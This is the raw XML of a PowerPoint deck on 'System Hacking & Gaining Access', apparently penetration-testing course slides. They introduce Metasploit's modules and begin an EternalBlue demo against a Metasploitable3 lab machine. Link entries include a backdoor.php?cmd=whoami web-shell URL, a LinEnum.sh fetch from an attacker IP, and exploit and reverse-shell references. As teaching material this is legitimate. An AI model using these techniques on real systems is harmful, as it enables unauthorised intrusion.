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40"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="266"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4" r:id="rId26"/>
    <p:sldId id="313" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="318" r:id="rId30"/>
    <p:sldId id="317" r:id="rId31"/>
    <p:sldId id="319" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="321" r:id="rId34"/>
    <p:sldId id="322" r:id="rId35"/>
    <p:sldId id="323" r:id="rId36"/>
    <p:sldId id="324" r:id="rId37"/>
    <p:sldId id="325" r:id="rId38"/>
    <p:sldId id="28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3/24/2024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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>©Bappe Sarker</a:t>
            </a:r>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3A52079-6997-47B8-B262-4ED5D2EA2D74}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/24/2024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C80CA-06EA-4D97-A1EC-F2A229B592C4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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60CC4-6CA2-4A99-B83B-711E420D000E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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©Bappe Sarker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5238998-10EA-455D-8FDC-3EBC7E198582}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/24/2024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4E9B6-2EC2-45E6-A437-DCC674AAC4AF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="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3/24/2024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55261-7117-41BB-BB79-8C1909625493}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/24/2024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3/24/2024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E378FF3-85EA-48E5-8D8C-1DB156807E49}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/24/2024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F94F13-1676-4B68-A383-661B657F6E63}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/24/2024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3/24/2024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t0kx/exploit-CVE-2015-3306"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t0kx/exploit-CVE-2015-3306.git" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/t0kx/exploit-CVE-2015-330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192.168.31.30/backdoor.php?cmd=whoami" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.31.30/backdoor.ph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book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-shee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kali_ip:port/LinEnum.sh"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exploit-db.com/exploits/37292"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acketstormsecurity.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/d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screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521654B1-7FDB-5FB2-CE07-FABACED5B044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="19" r="1" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6859300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Rectangle 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D9C7339-A6EE-4D61-A33E-64D65F757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155560" y="1125415"/>
            <a:ext cx="9867482" cy="459321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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A6586F7-A126-4F04-B9AA-AC0323374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92" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA6D22B-C59B-4B49-B613-F1A0DF012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2048293" y="1330774"/>
            <a:ext cx="8361229" cy="2098226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SysteM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hacking &amp; Gaining Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36A0527F-C5FD-4E9B-9F21-5D1FBA31314B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694393" y="4609838"/>
            <a:ext cx="6831673" cy="1086237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bappe Sarker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74557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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploitation Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are different tools out there for exploitation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open-source and paid tools also. Such as – Metasploit, core-impact and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For learning purpose, we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Metasploit Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>developed by Rapid7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework is command line based open-source framework for exploitation activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework is pre-installed in kali and parrot OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2000189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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploitation Framework (Metasploit)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>To start Metasploit, just hit the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> form the terminal of kali.</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493FCC2E-3BB4-255E-9E6E-C176F8D5100A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654575" y="3980596"/>
            <a:ext cx="4846727" cy="1886804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A506AD-F14F-8DDE-424A-A4E72783D039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654575" y="3476025"/>
            <a:ext cx="4846727" cy="604757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3201828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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploitation Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are 4000+ modules in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which are categorized in following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-framework/modules/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auxiliary – Used for scan and enumeration purpose </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits – Exploitation module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload – Payloads collection for shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Post – Post exploitation activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoder – Encoding purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – No operation sled, for buffer overflow attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evasion – Used for AV evasion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361079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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation Demo -1 (Metasploitable3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Windows SMB V1 exploitation ( AKA – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / MS17-010)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here in this demo, we have our vulnerable machine metasploitable3 windows server 2008. Which is vulnerable for this exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE29E8A-7695-FAF9-47C8-E66D799BC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1668705" y="3221813"/>
            <a:ext cx="9151695" cy="2645587"/>
            <a:chOff x="-26" y="2093276"/>
            <a:chExt cx="9151695" cy="2645587"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369DD569-D054-ABEA-4EBD-D4A8A68586D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="4838" t="6194" r="11032" b="3704"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001063" y="3803073"/>
              <a:ext cx="1310665" cy="935790"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F060482-BCB1-FF4F-FA36-C20C8AE64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377" y="3105090"/>
              <a:ext cx="948264" cy="895874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A2BB18-8934-137F-0A70-22D847B72C6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect b="25140"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3768436" y="2093276"/>
              <a:ext cx="1114048" cy="891714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Elbow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18BE167-796D-94E1-3E00-BCFB4B727A2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2311728" y="2837851"/>
              <a:ext cx="1546763" cy="965222"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96E6A43-0288-A913-3721-F9EFAFCC6EF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4821382" y="2837851"/>
              <a:ext cx="2479963" cy="570367"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">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AC4F9AE-F159-905F-BED1-7806B39449CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-26" y="4060733"/>
              <a:ext cx="1104826" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Attacker’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Machine </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBC4B0A-50A1-D9F7-F152-F9BFF4EB2BC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7381870" y="2267944"/>
              <a:ext cx="1769799" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Vulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Metasploitable-3 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" cap="none" spc="0" dirty="0">
                  <a:ln w="0"/>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="6E747A">
                        <a:alpha val="43000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Win-2008R2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171308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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploitation Steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Execution steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
